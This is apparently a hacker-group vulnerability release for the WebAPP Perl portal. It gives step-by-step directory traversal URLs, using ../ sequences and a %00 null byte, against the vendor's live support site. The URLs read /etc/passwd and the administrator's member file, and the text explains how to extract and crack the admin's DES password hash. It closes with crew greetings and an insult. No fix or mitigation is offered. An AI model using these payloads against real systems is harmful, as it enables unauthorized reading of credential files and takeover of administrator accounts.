WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. Its home site is at http://www.web-app.org/ Some features are : -Easy to Install on standard Unix servers! (Windows user-supported only!) -User Profiles -Message forums -Private messaging between members -Blog-style News Articles -Links and Downloads -Customizable themes -Multiple language support -Flat-file System-NO SQL DATABASE! -Membership controls -Open source Several user mods are also available which ranges from chat to e-commerce applications. Several vulnerabilities in these mods have already been discovered. The WebAPP system itself has a serious reverse directory traversal vulnerability. Example.. 1) Go to http://cornerstone.web-app.org/cgi-bin/index.cgi /this is their main support site/ 2) Click on Articles on the main menu at the left side of the screen 3) Click on any of the icons representing the misc topics available /i chose the "bugs" section/ 4) You'll wind up with the url "http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=bugs" on the address bar on your browser. Change it to "http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00" 5)View the html source for the page A more interesting file to look at would be; "http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00" View the html source code and scroll down until you come to the line with; href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"> "adUCOOzV2ljgg" is the hashed password of the Administrator. It's standard DES encrypted so you can run a password cracking program to crack it Every user would have a corresponding .dat file within the db/members directory PhTeam Release Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps, ch1m3ra, and sa mga posers na kupal sa #oneball Philweb Corporation FREEMAIL Services http://www.philwebinc.com